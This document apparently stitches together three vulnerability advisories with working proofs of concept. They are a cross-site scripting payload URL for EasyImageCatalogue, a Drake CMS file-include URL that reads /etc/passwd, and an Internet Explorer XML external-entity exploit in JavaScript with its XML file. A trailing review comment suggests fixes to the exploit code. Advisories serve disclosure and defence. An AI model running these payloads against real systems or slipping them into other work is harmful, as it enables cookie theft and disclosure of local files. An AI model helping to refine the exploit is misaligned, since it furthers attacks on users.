onlinetools.org EasyImageCatalogue is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyImageCatalogue 1.31 is vulnerable; other versions may also be affected.
http://www.example.com/addcomment.php?d="><script>alert()</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28165/info
Drake CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
Drake CMS 0.4.11_RC8 is vulnerable; other versions may also be affected.
http://www.example.com/install/index.php?d_root=/etc/passwd%00


@ -0,0 +1,131 @@
source: http://www.securityfocus.com/bid/28143/info
Microsoft Internet Explorer is prone to a remote information-disclosure vulnerability because of a flaw in the interaction between JavaScript and XML processing in Internet Explorer.
To exploit this issue, an attacker must entice an unsuspecting user to visit a malicious website.
Successfully exploiting this issue allows remote attackers to gain access to the first line of arbitrary files located on computers running the vulnerable application.
<script language="JavaScript">
// load new XML document.
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
function XML(file,list) {
/*
Available error messages:
------------------------
:: parseError.errorCode
:: parseError.reason
:: parseError.line
:: parseError.linePos
:: parseError.srcText
------------------------
*/
xmlDoc.async="false";
xmlDoc.validateOnParse = "true";
xmlDoc.onreadystatechange=chk;
xmlDoc.load(file);
if(list) {
listXML(xmlDoc.documentElement)
} else {
document.write(xmlDoc.parseError.srcText);
}
}
function chk() {
return (xmlDoc.readyState!=4) ? false:true;
}
function listXML(xmlsrc) {
// for valid DTD files, list the complete tree
if(xmlsrc.hasChildNodes()) {
document.write('<ul><li>');
document.write(xmlsrc.tagName +' => ');
for(i = 0; i < xmlsrc.childNodes.length; ++i) {
// recursive walk
listXML(xmlsrc.childNodes(i));
}
document.write('</li></ul>');
} else {
document.write(xmlsrc.text);
}
}
XML("28143.xml");
</script>
==========================================28143.xml=======================================
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!DOCTYPE show [
<!ENTITY % name SYSTEM "file://localhost/FirefoxPortable/Data/profile/kf.txt">
%name;
]>
<show>
%name;
</show>
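Review bot: listXML iterates with `for(i = 0; i < xmlsrc.childNodes.length; ++i)` on an undeclared `i`, so the counter is a shared global and each recursive call on a child that itself has children overwrites the caller's position, skipping or repeating later siblings; `for (var i = 0; i < xmlsrc.childNodes.length; ++i)` gives each level its own counter. The XML side deserves a sentence in the file header as well: the disclosure appears to rely on the parser resolving the external parameter entity `%name;` declared in the DOCTYPE of 28143.xml, which is the behaviour MSXML's `resolveExternals` setting governs, so naming it tells a defender which setting is at issue. Note also that the default call `XML("28143.xml")` passes no `list` argument, so the tree-listing branch is never reached from this file and only the `parseError.srcText` branch is exercised.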